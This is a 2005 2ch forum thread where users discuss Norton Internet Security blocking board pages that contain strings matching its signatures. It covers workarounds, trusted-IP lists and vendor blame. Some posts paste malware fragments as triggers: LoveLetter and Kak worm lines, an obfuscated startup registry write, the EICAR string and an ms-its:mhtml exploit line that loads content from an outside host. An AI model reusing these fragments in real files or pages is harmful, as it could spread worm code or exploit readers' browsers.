http://info.2ch.net/wiki/pukiwiki.php?%CA%E4%C2%AD%A4%C8%CA%E4%B4%B0#Norton_Emergency_measures
ttp://ansitu.xrea.jp/guidance/?NortonInternetSecurity#Emergency_measures
ttp://ansitu.xrea.jp/guidance/?Trap#Emergency_measures >>386補足
(ry続き
りました。
どーもRockっぽいので・・・
>>303-352
ありがとうございます。 ttp://d.hatena.ne.jp/palm84/
↑こことか
ttp://kmajo.blog34.fc2.com/
↑ここを見ると とりあえず実害としては
「IEが落ちる」だけなのかな?
シグネチャ除外しようかな・・・ 303-352の中に変なコードある?
ノートンが検知して見れないけど みんなノートンやめるやめる言ってるがどのソフト入れる? NIS使い2ちゃんねらが全員信頼ゾーン対策した瞬間
JIMが気ィ狂って2ch鯖に攻撃スクリプトを組み込むという
ダメシナリオで映画化決定 >>396
それが怖いから信頼ゾーンに入れられないんだよなあ… だから信用出来ない人用に>>108のAAがあるわけでw お前らちょっと無防備すぎだぞ
今回のはどうも火傷だけでは済まないような気がする
小心者が救われるかもな。 淘汰されるべきというのもわからんではないが、
もうちょい方法があるだろうて。。。 本件の主犯はマイクロソフト、IEの穴をふさいでないからNISで対応
それが裏目に出たのがこの騒動
218 名前:水色@飛行石 ★ 投稿日:2005/11/28(月) 14:14:56 ID:???0
うーん。
ノートンやめちゃったからよく判らないですがー。
MSの脆弱性の部分をノートンが対応したら、
それがトラップに利用されちゃったってことかなー。
この中で一番悪いのは誰?
・クソIEのセキュ穴対応が遅いMS
・ただの文字列でも反応させてるシマンテック
・コードの書き込み禁止にしない2ch運営(特にマァヴ)
・自分の意思でNIS導入したユーザー
・姉歯と小島と藤田と木村 参加者追加
・クソIEのセキュ穴対応が遅いMS
・ただの文字列でも反応させてるシマンテック
・コードの書き込み禁止にしない2ch運営(特にマァヴ)
・自分の意思でNIS導入したユーザー
・姉歯と小島と藤田と木村
・お前
・俺
・母ちゃん
・小泉
・将軍様 この文章を見た人は、4日以内に不幸が起き、44日後に死にます。知り合いは、
これを信じず、親が死にました。それが嫌なら、これを、5カ所にコピペして下さい。
>>410
年内に死ぬ予定なんでべつにかまいません 運営がとろとろしてるからいけねぇんだよボケが
じっくりことこと煮込んでんじゃねーんだよ
とっと対応しろやカス 運営などいないという突っ込みは置いておいて。。。
>>418
http://qb5.2ch.net/test/read.cgi/operate/1132976990/448-449
448 名前: ◆SSu.zv/rvs [sage] 投稿日: 2005/11/29(火) 15:14:32 ID:zBqE3jpw0
淘汰されなきゃね、
生き残りを手伝う気はさらさらないっす
449 名前: ◆MUMUMUhnYI [sage] 投稿日: 2005/11/29(火) 15:18:01 ID:VEIDKG1+0
そんな迷惑なソフトなんて、自然にまかせてなくなるべきだって、
おじさんはゆうだろうな。
私も、そう思っていたり。 素通りさせる以外(信頼に追加以外)
なにか有効な方法ないのか?
つーか「信頼が追加」が「有効」なんてマジでいってんのか? >423
NISを窓から(ry
今回の件で大分問い合わせ来てるにもかかわらず何も対策する予定もなさそうなので
別なのに乗り換えた方が無難かも >424
参考記事
「2ちゃんねるの一部掲示板が見られない」Nortonがアクセス遮断
ttp://internet.watch.impress.co.jp/cda/news/2005/11/30/10035.html >>425
今回の件はノートンが、なんとかするべきだろ?
今回のコードは短過ぎる。貼る馬鹿は後をたたない。
例えば「orz」が攻撃コードと認定されたら書いた奴のせいか?
買ったばっかりだけど返品できるのか?>ノートン ラブレターとか他のウイルスコードのことから考えてもシマンテックが対応する可能性は低い
セキュリティソフト乗り換える・反応がウザくても使う・セキュリティを無効にする・2ちゃんねるの鯖を信頼する
全ては利用者の判断 今はイタズラで済んでるし、NIS使ってる人だけの問題だけど
実際にこの脆弱性をを利用して被害を受けた場合
その書き込みをに対する処置をしなかった運営は問題にならないの? ノートンが誤反応する文字列を書き込んでどんな被害が発生するの? >>430
ただの文字列は攻撃してこないんだが
ノートンが過剰反応しすぎなんだよ IEの脆弱性とNPFWのバグを同時に語るから混乱するんだ。
先生のバグだけに目を向けろ。IEの脆弱性はMSの問題だ。
ひろゆこが悪意のあるスクリプトを仕込む可能性があるとでも言いたいのか?>>430 1.セキュリティソフトを乗り換え
このままノートンを使っていれば防げたはずの被害を受けるかもしれない
2.このままノートンを使う
今他のセキュリティソフトに乗り換えておけば防げたはずの被害を受けるかもしれない
3.この脆弱性に対する検出を無効にする
この脆弱性をついた攻撃を受けるかもしれない
4.2ちゃんねるのサーバを検出対象から除外する
2ちゃんねるを改竄して攻撃してくる人がいるかもしれない
2ちゃんねるを書き換える権限を持った人が攻撃してくるかもしれない
IPアドレスを詐称する方法を考案して攻撃してくる人がいるかもしれない
どれが起こりそうでどれが起こらなそうか
全ては自分で判断しなければなりません >>433
運営自身が何もしなくても○国人(○にはお好みの文字を入れてね)に2ch鯖
ハックられてありとあらゆる攻撃スクリプトを押し込まれるという可能性は無くもない 攻撃してくる文字列は存在する
お前らマジで気をつけろよ
だから心配性なお前らのために(皮肉で)>>108の
AAが用意されてるんだよw >>435
もちろん可能性は0%ではないわな。
でもそれを言い出すとキリがないし、おじさん達のサーバ管理能力を疑う事になる。
当然100%信用しろとは言わないが。まあ>434て事で。 MSがパッチ出すまでIE以外のブラウザ使うようにして
HTTP MSIE javaScript OnLoad Rte CodeExecのチェック外せばいいじゃん
なんで自分でどうにかしようとしないんだろうな ノートン叩いてる人はもし自分のウイルスソフトが同じような事したら笑っていられるんだろうか >>440
IEの穴がふさがっても、このままだと、誤反応するのは同じだぞ。 自分でどうにかはわかるけど、やっぱノートンのファイアウォールが駄目だよ
実害のない文字列として、きちんと判別できないなんてまともなソフトといえない >>441
だれも叩いてるようにはみえないが。不具合を不具合と指摘してるだけ。
> 自分のウイルスソフトが同じような事したら笑っていられるんだろうか
とっとと捨てる。 >>443
金取ってるソフトだし同意とはいえるが・・・
しかし、こんな些細な事で吠えてたらOSだってクラッシュするしキリないじゃん?
問題は使い手じゃないかな?
こんな簡単な問題自分でクリアできなければ、ネットってかPCやらなければいい。
むしろPC触る資格がない。
それだけじゃない?
だから、ノートン叩いてるのはド初心者かネタのどっちか。
自分で使ってるOSの方が沢山の問題抱えてるんだからね。 >>445がきっと修正ファイルを作ってくれると信じてる 便利であればみんなが使うしそうでなければ離れていく
それだけの話 |
\ __ /
_ ( m ) _ピコーン
l≡l
/ ('A`) \ そうだ俺たちにはまだ「人に優しい1ch.tv」があるじゃないか!
ノヽノヽ
くく >>117
>>118
NG使えるよ、透明で登録しておくと使える
ただし>>118の言うように原因究明で困る。
というのは、普通は自動で消されて問題ないのだが
該当レスにリンクする奴がいるとひっかかる。
その時は消えたレス番を探してそいつにリンクしてる奴を探さなければならんいかんので面倒。
という事でやっと突き止めた
>>299のように該当レスに>>でリンクするのはやめてくれ・・・ 死万木偶の工作員ウザ杉。
なんの為に金払ってるんだ? なんの為のFWだ?
正確に有害なものだけを遮断するためだろう?
なんでもかんでも遮断するだけならFWなんていらねーよ。
「インタテーネッツは危険だから全ての接続を遮断します。」
これで金払えってか? ふざけるな。 とりあえずノートンを叩いて、「おれはわかってるんだぜ」と通ぶりたいんだろw ギコナビで透明あぼ〜ん(レスポップアップ時のあぼ〜ん有効にチェック)すれば
>>3しなくてもいいんだな >>451
返品とかって、、、ノートンレベルの糞ソフトも使いこなせないならネットしない方がいい。
その前にバグだらけのWindowsをMSに返してこい。
つーか、初心者はノートン使うなと。 被害妄想や詭弁や煽るだけじゃなくてさ、救護するなら
もっと建設的な意見をいえよ。叩かれていると思ってるみんなに。
NPFWを使い続ける理由を。 >>458
俺が脳豚を使い続ける理由は、10秒もあれば設定できて使えるから。
他の入れたりすれば金かかるしフリー入れても10秒ってわけにはいかないから。
そして救護だか何だかしらんけど、俺がここに書く理由は楽しいから(笑) >>454 ID:SqpGkdpj0
凄い厨が湧いたな・・・
初心者だからノートンが誤作動するってか?
初心者も糞も、どんな玄人が今回の件を回避出来てるんだ?
対策が有害無害まとめてスルーしかない(これは回避策じゃない)
ノートンにちゃんと識別させる方法を教えてくれ。 >>460
シマンテックが対策する以外に方法は無いと思うが >>460
何いってんだ?
俺は、ノートンの設定もできない初心者じゃしょーがねーってこと言ってんだよ。
>ノートンにちゃんと識別させる方法を教えてくれ。
それに何?そんな文句はシマンテックに言えよ。
脳豚に識別させるってソース開かねーんだからできるわけねーべ アホか。
俺は、文句言ってる暇あるなら設定しろと言ってるんだ。 >>462
もう、お前が初心者で厨なのは良くわかった。
IP素通りさせるのが「設定」か?(笑
初心者板で大人しくしてろ低脳。 >>462
だから煽りや詭弁は止めろといってるだろ。落ち着け。
>459をみるに、用は他のを入れるのマンドクセーし金払う気もないから
多少の不具合は設定で我慢するぜと言うことかな。
それも一つの意見だな。 >>463
IP素通りさせるのが「設定」だ。
それ以外にノートンをどうにかできると思ったのか?
変な夢みてるんじゃねーよ。ド初心者が(笑)
つーか、気に入らないなら素直に他の使えばいいだろ。
まぁ、オマエにはIP受け入れてその後にフィルタ掛けるなん(ry 6 名前:ひろゆき ◆3SHRUNYAXA 投稿日:05/01/09 00:00:25 ?## ID:RlY1yXg2
議論して、知識を得ようとしてるんじゃなくて、
勝ち負けにこだわってる人ってのは、
基本的に頭悪いと思ってます。。
>>466
だから煽(ry
本質がずれてないか、NPFWが単なる文字列に反応する事に関しての情報の蓄積が趣旨のスレだぞ。
折角だから、使用者が初心者が多いだろうからその通のテクをここで披露すればみんなのためになるぞ。 ひろゆきの”頭悪いと思ってます”シリーズの煽り、あと何通りあったっけなぁ >>453
あー、ポップアップにもできるならいいのかもね
LIVEにはあったかなー
と思ったら>>455駄目でしたか
何故かあぼんじゃ駄目なんだよね >>14やってみたけど未だにダウン板が見れない・・・
ナゼに?? >>468
確かにそうだなw
つか、正直煽りで暇潰して楽しんでいた。
荒らしてスマン。
BF/Q6J/m0 にも謝っておくよスマン。
じゃ一応俺の環境を書いておくよ 参考にならんと思うけど。
俺の場合ネットにはルーティングマシン通して接続してるから
ルーティングする際に怪しいコードを弾いてローカルで観覧してる。
つまり脳豚ファイァオールではなく別のマシンが防火壁になってる。
だから実は脳豚は関係無かったりする(´・ω・`)
そんじゃ消えます >>472
autoblockのほうで設定してるとか
1日前の俺のことだが('A`) まとめページの対処方法をやってみたら
板覧がおかしくなったんですが元に戻せますかね?
janeDoeViewです http://www.microsoft.com/japan/technet/security/advisory/911302.mspx
これによるとアクティブスクリプトを無効にすれば
HTTP MSIE JavaScript Onload Rte CodeExecの検知は必要なくなるみたいだね。
2chを信頼したくない人はこっちでやった方が良いかもよ。 \ __ /
_ (m) _ピコーン
|ミ|
/ .`´ \
('A`) そうだ諦めよう!
ノヽノヽ
くく
>>474
もう一個の設定出来たらスムーズに出来ちゃいました!
親切にありがとね。 あの、
【Norton Internet Security】
↓
【侵入防止】
↓
【AutoBlock】 ←
手動で【遮断しているコンピュータ】を【すべてを遮断解除】→↑
の繰り返しが安全じゃないですか? コードが貼られたスレ(板)開く
↓
侵入検出
↓
遮断解除
↓
取得をやりなおす
↓
侵入検出
↓
以下ループ
穴あけないと使えない んなろー!ブラッドハウンドなんぞ貼ったやつ出てコイや!めんどくせー('A`)
さっきは実況chTXでも検出したぞ >>485
それはノートン先生からログ除外すればいいんじゃ・・・(´・ω・`) なんかスレの流れが変。
「危険が嫌ならFW乗り換えろ」って意見は多数出る。
しかし金出して買った権利どうすんだ?
ユーザーに誤作動の責任なんか無いぞ。
乗り換えるにしても誤作動が原因なら当然返金だよな?
正規ユーザーがおらんのか? 工作員が邪魔してるのか? >>487
442 名前:動け動けウゴウゴ2ちゃんねる 投稿日:2005/11/29(火) 15:01:54 ID:eTCs9aYs0(1)
>運営の人
ノートン誤作動の件なんだけど明らかに狙って書き込みしてるんだから
特定文字列を書き込みしようとした人を強制バーボンとかしてもいいんじゃないの?
448 名前: ◆SSu.zv/rvs 投稿日:2005/11/29(火) 15:14:32 ID:zBqE3jpw0
淘汰されなきゃね、
生き残りを手伝う気はさらさらないっす
449 名前: ◆MUMUMUhnYI 投稿日:2005/11/29(火) 15:18:01 ID:VEIDKG1+0
そんな迷惑なソフトなんて、自然にまかせてなくなるべきだって、
おじさんはゆうだろうな。
私も、そう思っていたり。 >>488
誤作動するのは2chだけか?
>>489
代わりは? マックか? リナか? トロンか?
OS換えるよりFW交換の方が安くて早い。
選択肢もOSより多い。
なにより
「ゲイツさん、ノートンが誤作動します。OS代金返して」
「ノートンに言え。他のソフトじゃ誤作動しない。」
で終了。 >>486
えーと、言葉足らずだったかな
めんどくせーのは、検出されるたびにそのIPを信頼リストに入れるのが、ってこと
(ま、2chすべて信頼済みにすればいいんだろけど)
実動作しない単に貼られた文字列に反応するノートン先生もトンチキだけど、
そもそもそういうのを貼るのが困ったもんだわ('A`) 自殺したとか言ってたのに今日も元気に2chかよ磊厨w 再インストールしたら、問題解決した。
ノートン側が対応したのかな。 INSの除外にbody onload=w**w()を追加じゃ駄目なの? 181 ◆Reffiz2Zh. sage 2005/11/28(月) 11:34:22 ID:BlBjwc9/0
>178
新手のノートントラップです。
ここじゃ、明かせないのでメールにて説明しますね。
186 ◆MUMUMUhnYI sage 2005/11/28(月) 11:51:32 ID:/3xX5FyA0
>>181
メール届きました。
ううむ。なんだかなぁ。
188 ◆MUMUMUhnYI sage 2005/11/28(月) 11:52:48 ID:/3xX5FyA0
とりあえず、問題の本質は理解したです。
ノートントラップというか、問題はもっと根が深いかんじですね。
公開情報ではありますが、確かに現段階では、ここに書くのははばかられるです。
194 ◆MUMUMUhnYI sage 2005/11/28(月) 11:56:51 ID:/3xX5FyA0
ひとことだけ。
「ノートンから除外した場合(というか一般的に当然ですが)には、
不審なリンクは不用意にクリックしない」
とゆうことで。
・・・なんか裏で極秘プロジェクトでも進んでるの? >>498
公開の場に詳しく書くと、見る人が見た時悪用できるって事だと思う。
最後のは「ノートンの防御機能を無効にしたらユーザーが気をつける」
むむむさんが書いてる通り当然のこと。
ってかノートン入れてても怪しいリンクを安易に踏まないのは基本。 侵入防止のHTTP MSIE javaScript OnLoad Rte CodeExecに
更に細かく除外するコンピュータの設定がついてれば今より少しは安心出来るのに
まあそこまで細かくしすぎると管理し辛いか 昨日からノートン入れた者なのですが
ニュー速のスレを開いたら何者かが侵入を試みたので防ぎましたみたいなのが
出てそれからΝ速、+、共に見れなくなりました・・・ このスレ全部読めばそんな書き込みしなくても解決するだろうに・・・ >>503
確かにな。「2ch鯖からのHTTP MSIE javaScript OnLoad Rte CodeExec検知」だけ
除外できれば言うことなしだったのに。 <body onload=window()>
テスト >>511
<body onload=window()> 今は間カフィのほうのPCでアクセスしてるからこのスレがちゃんと見えるけど、
野トンだと>>509以降の表示がぶっ壊れるよ
なにやってんだかな、野トン先生orz どれどれ。実験。
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
End Sub ∬
酒 (´д`) < 俺、知ってるよ…。
======== \
/※※※※ゞノ ,_)
~~~~~~~~~~~~~~~~ >>510
氏ね
>>512
お前も氏ね
>>517
お前は氏ねじゃなくて死ね! c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
End Sub >>512とか>>517とかの文字列が反応するのって、
どういう誤認で誤作動するわけ?具体的に頼む >525
>>22の記事を読めばなんとなくわかるかと。 >>517の本文は専ブラのログフォルダを除外対象にしとけば無問題 ホントに無問題なのか!?
確かに反応はしなくなるが、それを逆手に利用しLogフォルダを狙ってくるかもと妄想してみる
まだじゃまくさいが*.dat毎に設定した方が… >>697
わかったか?
よし、わかったんなら席に着け。 >>697
( ´д)ヒソ(´д`)ヒソ(д` ) >>697ちゃんったらー、ちゃんと見てないからそうなるんだよ。
まったくもー。 ノートンの
侵入阻止→拡張→HTTP MSIE javaScript OnLoad Rte CodeExec
のチェックはずして、
オミトロンの
Onload Unloader
をオンにスルだけで解決するんだが。
何をそんなに騒ぐ。
専ブラはdatしか読みに行かないから、ノートンのチェック外しても
何ら問題は無い。
問題はIEの味噌も糞も一緒くたにとっとくテンポラリフォルダだ。
これもブラウザ閉じた時にキャッシュを削除する設定にしておけば
多少は安心だろう。 ノートンのインジケータを隠してたから長いこと原因に気付かなかった
やれやれ・・・ いきなりフジ実況見れなくなった。。。
まとめサイトの対策してるのに <body onload=あwindow()> ms-its:あmhtml:file://c:\
誤作動うぜぇー
最近書き込みが減ったところを見ると、双方対策されたって事? 暫定処置で凌いでる、ここを見られないのどちらかかと なるほど。
それなりに情報も行き渡ったって事ね、了解。 ノートンの信頼ゾーンから例のアドレス群を削除してもまったく問題なし。
どうやらこの前のupdateで、Symantecが対応したようだ。
まあ、定義ファイルちょこっといじるだけだしね。 2006でアップデートしてみた
何故か専用ブラウザ(JaneDoeView)だと問題なくなったけど
IEで見ると以前と同じように侵入防止される 2chブラウザを使ってると、ログの再取得をしないから、反応しないだけ。
ログを一旦消して、誤爆文字列を再読み込みさせると遮断されるよw
ん?
2005+かちゅだけど、ログ消して再取得してもまったく問題ないよ。
確かこのスレにもコード張ってあったよね。
該当スレ削除されてるのかな?
数日前から信頼ゾーン元に戻してあちこち見てるけど、一度も遮断は起きてない。 信頼解除してこのスレ再取得で問題なし
ログ削除してJane再起動してこのスレ取得してみたけど問題なし >>561
ちゃんと消してからやってるけど?
とりあえず自分で検証してから煽りいれないとただの恥ずかしい人だぞ 今日2006インスコ→LiveUpdateした後
JaneDoeStyleでこのスレ開いてみたけど大丈夫でした。
(もちろん、ログ再所得済)
ただし>>559同様、IEはダメ。
一度IEで開くと、その後はJaneでもダメ。
ノートン先生はいったいどんな対策を施したんだろう、、、 2ch側で何か対策した?
専用ブラウザでの閲覧は現在問題無しみたいだ。
もちろんログ消去をやった上で。
少なくても日曜日の段階では、自分も専用ブラウザの閲覧でトラップに引っ掛かっていた。
317 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2005/12/11(日) 14:25:00
2005は直ってないの?直ってたら乗り換えようと思ってるんだけど
318 名前:名無しさん@お腹いっぱい。 [] 投稿日:2005/12/11(日) 14:50:13
2006が直った言うのはマジですか?
319 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2005/12/11(日) 14:58:53
2006直ってないよ。
シグネチャ更新しても、問題のヤツはそのまま残ってて、いきなり遮断されたしw
プログラム本体の更新が無い限り直らんでしょ?これ。
ホントに直った人いるの?
320 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2005/12/11(日) 15:00:33
また工作員の虚言か!
321 名前:297 [sage] 投稿日:2005/12/11(日) 15:00:54
ありがとう。
やってみるよ。
322 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2005/12/11(日) 15:27:18
あれ・・・DL板で更新したら問題なく更新されたんで直ったと思ったが何回かやってると遮断してるな・・@2004
なんじゃこりゃ
で、IEによる閲覧では現在も遮断される事から、最新のアップデートでもノートントラップが対応出来ていないのは明らか。
どーなってんの???
ノートンLiveUpDateしますた。
シマ対応した模様。
この問題については、解決したのでは。
>>573
Updateしてみましたが、やはりIEでは遮断されました。 工作員ウザ杉
本気で売買契約解消しようと思うんだが、
誰かシマンテックと交渉した奴いる?
これはOSのせいじゃなく「ノートンのFWだけ」の誤作動だから
返品できるよな? 交渉は小売とした方が良いのか? 2006で、ここのログを取得してみた。(専ブラはログを破棄して再取得)
専ブラ(Live2ch、かちゅ)では遮断されなかった。
普通のブラウザ(IE、Opera)だと遮断された。
うーん、不思議。 >>580
プ 工作員必死だなw
都合が悪いレスを煽って誤魔化すってことは
やっぱり返品出来るんだなw
そりゃそうだ他社のFWじゃ誤作動しなくて
ノートンだけ誤作動じゃ言い訳できないもんな。
工作員の必死さから良く分かった。
返品の話が都合悪いの?w んー?w 悪いの?w 誤作動ではなく危険なコードは完全に弾く仕様になっております。
もし、信用できるサイトの観覧に不都合が生じた場合は
そのサイトを信頼ゾーンに追加して下さい。
と。 >>580
>サイトの観覧に不都合が生じた場合は
>そのサイトを信頼ゾーンに追加して下さい。
いやだ。
信用できるかどうか分からんからFW入れてんだよ。
それに今回は
「サイトの観覧に不都合が生じた場合は〜」 じゃねーだろ?
「FWのコード識別に不具合が生じてる」
「不都合」でなく「誤作動」 >>583
お客様、何度も申し上げますが誤作動ではなく仕様です。
なにとぞ御理解下さい。
分かりやすく説明するとこうなる↓
ハァ?どーでもいい一般ユーザーは黙ってろっての!
グチグチうるせーな。
スキル無いボケが生意気いってんじゃねーよ!!
返金?返品?シラネーヨ!
嫌なら裁判でも起こせばいいだろー
知識の無い裁判官言いくるめる弁護士雇う金がこっちにはあるんだボケ!!
ネットで吠えてねーでやってみろ根性なしが(ププp ついさっきWindows Updateの通知があったんだけど
これってノートン先生誤作動の元になったセキュリティホールとは無関係ですか?
http://www.microsoft.com/japan/security/bulletins/ms05-054e.mspx >>585
対応したみたいだね
それでもupdateしない馬鹿がいるかもしれないから誤作動を続けるであろうノートン先生に敬意を示さねば
http://pcweb.mycom.co.jp/news/2005/12/14/007.html >>586
一応コピペ
>「不適切な Document Object Model オブジェクトのメモリ破損の脆弱性」は、
>JavaScriptでwindow()イベントが使われた場合に任意のコードが実行されるというもの。
>ネット上では5月にすでに情報が公開され、この脆弱性を悪用するトロイの木馬も登場しており、
>ユーザーは至急パッチを適用すべきだ。 Windows UpdateもノートンのUpdateもしたけど駄目だったよ・・・ orz いや先生もう対策しちゃってるしね
この悪戯もいずれ下火になると思うので、もう設定で対処しないで
引っ掛かったら一時的に切って遮断解除、が一番安全だとは思うけどね
ただ、例えて言えば、ノートン先生って
子供が男子高校生なのに、痴漢がどうのとかいって塾の送り迎えしたり
二十歳超えたのに、夜は危ないから8時以降は外出するのは控えなさい、
とかいうオカンなんだよなw
五月蠅い事この上ない
>>586,587
thx MSのパッチを当てて、ノートンの侵入検出シグネチャを切れば良いって事だな。
>>592
>MSのパッチを当てて、ノートンの侵入検出シグネチャを切れば良いって事だな。
馬鹿じゃないですか? ウザ警告だけ消せれば他からどんな攻撃を受けてもかまわない、
というのなら592の方法で正しいけど。 シグネチャ選んで消せるなら、今回の消せば解決では?
脆弱性はパッチで解決されてる訳だし それが解決?
ノートンが誤反応する事が問題だろ。
なんでこんなに馬鹿が多いの? >>598
ここ2ch運用情報板のスレだし、、、
利用者が対策して2ちゃん使えれば解決でしょ? >>598
バカはおまい一人だと思われ。
脳豚の誤反応を語るならソフトあたりにスレ建てろ。 んで先日のMSのアップデートしたらシグネチャ除外でHTTP MSIE JavaSvript〜
っての切っても問題ないの?
これってMSのバグの脆弱性を埋めるためだけのやつだよね? Windows UpdateとノートンのUpdate済ませて
それ以前にブロックされてたスレが普通に読み込めたので
シマが対応したと思ったのだが、やはりスレによっては、
ブロックされるようです。
まんどくさいなー、悪戯やめれ! >>601
ノートンが対応したって言う馬鹿がこのスレにいるから
そういう奴もでてくるんだよ。 MSがセキュリティホール埋めたけどシマンテックはこのHTTP MSIE JavaScript〜
に関する文字列の検知を変更しないわけね?じゃあシグネチャ除外が一番かなあ…
個人的にはどうせIEほとんど使わんし、どこぞの反日クラッカーに2ちゃん鯖クラックされる
リスクの方が怖いや。 ログ削除して専ブラ使えば良い、なんて書きこみがあるけど、>>570,>>579など。
これってシマンテックの社員なの?
専ブラ使っても相変わらず駄目だよ。
悪質な嘘をつかないでくれるかな。
マジでムカついちゃったよ。 ノートン2006 + JaneDoe View α ( build date: 051128 )
でログ取得し直しても問題なく使えてるけど?
馬鹿みたいな事書き込んでないで先ず自分の環境くらい書こうよ >>607
なんで社員がそんなこというんだよw
あんた馬鹿だろ。 ログ取得し直しても問題なしって人は設定が間違っているか
無意識に警告が出ない設定にしてあるって事に早く気がついたほうがいいよ。
解らなくて警告が出ないより、解ってて解除する方がいいからね。 NIS2006 + twintail v2.0 beta36 + Windows 2000 SP4 + MSの対策パッチ
NIS2006の「HTTP MSIE JavaScript Onload〜」の侵入防止シグネチャ有効。
そのシグネチャのプロパティーで、検出時に警告を出すように設定している。
Twintailのキャッシュをフォルダ毎削除して、このスレを読み込んでも反応無し。
そのあと、IEでこのスレを開くと遮断される。
遮断されたIPを解除し、Twintailのログを削除して、再読み込みしても反応無し。
そのあと、IEでこのスレを開くと再び遮断される。
このような症状になってる人が他にも居ると思うが、マジで原因が判らんよ…
>>610
2ch専ブラで問題なしIEで問題ありって人が実際多数いるんだし
俺もJaneDoeView最新版で問題なし
お前みたいな訳分からない否定をするやつは何故自分の環境を書いたり試したりしないんだ? その多数のうちの大多数が大いなる勘違いだということはもう言わずもがな >>613
OnloadのやつはIE特有のバグらしいからIEコンポーネント系以外は反応しないように
対策したかも知れないとか考えられないの?
とりあえず変な事ぼやいてないで何か否定材料出してよ、検証しようがないから 自己レス
FireFoxってのを入れて試してみたけどこっちでも反応したな
単純にIE、非IEで分けている訳では無いみたいだ >>614
Operaで反応し、IEコンポーネントの2chブラウザで反応しないんだが。
もちろん警告は出るようにしてあるよ。 USER_AGENTをIE以外に偽装してIEでアクセスしたりとか試してみたが、関係無いみたいだ。
もしかしたら、どこかで陰険なチェックが入ってないかと疑ってみたんだがw
>>13してlive updateしたらとりあえず治った。 >>621
ほんとだ!>>13してlive updateしたら直った!
直った奴はこれやってたんですね。 スマンテクの対策は終わったみたいだが、対策前にこれが保存できなかったが、バスターで一度読んだ後
対策前のノートンで読んだら問題なかった。不思議? 専用ブラウザの基本的なしくみを理解できない馬鹿がこんなにもいるのか XPとMeを持っているんですけど一つで二つのパソコンに2006をインストール出来るんですかね?
なんかこのスレを見るだけでもウイルス探知が反応するんだが。 >>636
こういう愉快犯が一番腹が立つのだが。
こいつもどうせVIPの空気コテだろ。
まったくVIPってのは糞しかいねえな。 >>643
なんだ、奴はVIPPERだったのか。時々実況邪魔しにくるのがウザいと思ってたが。
何れにせよヒッキーネカマにゃ死んでもらいたいな。 上級者キタ━━━━━━(゚∀゚)━━━━━━ !! さらに変なことになってすべてのサイトにアクセスできなくなったからファイヤーウォール設定低レベルにした・・・
もうむちゃむちゃだ・・・ また見れなくなってきたんだが
追加IP誰かおせーて >>655
拾ってきたけど必要なのは一番下だけかな。
そのうち詳しい人が出てくると思う。
(新規追加)
+live22y.2ch.net:206.223.150.64
+live22y.2ch.net:206.223.150.74
+live22y.2ch.net:206.223.150.84
+same.u.la:206.223.157.12
+chirasi.u.la:206.223.157.17
+bbm.u.la:206.223.157.32
+stock.2ch.net:206.223.150.250 Bloodhound.Exploit.6
これなんですか?2チャンネル見てたらどんどん出てきます。 AVG free soft は使って問題起こさないの 誰か教えて ごめんなさい ノートンユーザーです
普通に見れていましたが、ウイルス検知が作動して
ラブレターやらいろいろ拾います。いろいろといっても
3回ほどですが、、、orz Jane Doe Styleをアップデートしたら2ch読み込まなくなった。
>>652を設定しなおしてもダメ。
どうすりゃいいの?教えてエロイ人。 当方ギコナビ使いだが、何故かTBSとフジの実況板に入れん!
板全体がこれに感染してると出る。
http://www.symantec.com/region/jp/avcenter/venc/data/jp-wscript.kakworm.html
ほかの実況板には入れるのに・・・・
ヽ(`Д´)ノウワァァン http://life7.2ch.net/test/read.cgi/intro/1140623959/688
誰かがこれを貼ったらノートンが反応するようになった
ただ、警告が出るだけなのでそれほど深刻な被害にはなってないのだが、
(いろんなスレで見かけるし)問題は、こういう知識をどこで得るのかこいつらは。
そして、どういうつもりで、なにが楽しくてこんなことやってるのか。
こういうことして喜んでるキモい奴が日本のどこかで普通に生活してるというだけで気持ち悪くて吐きそうなんで
みつけだして死刑にしてもらえませんか? HTTP MSIE JavaScript OnLoad Rte CodeExec
っていうのもノートンの誤検出? つかスレを最初から読んで情報を得るという発想がなくて
聞きたいことだけその場で聞くなんて奴は掲示板使うな >>674>>675
見ようとしたらノートンが作動して見れなくなるんですが・・・ 確認の時くらいはノートン切る勇気もてよ
2chログから本物のウイルスなんて出てくるわけないし
それができないなら2ch利用を諦めるんだな
>>679
マジレスすると専ブラをFWの監視対象からはずす >>683
ttp://sv2ch.baila6.jp/sv2ch01.html ノートンアンチウィルス2006のFW無し版でワーム検出で
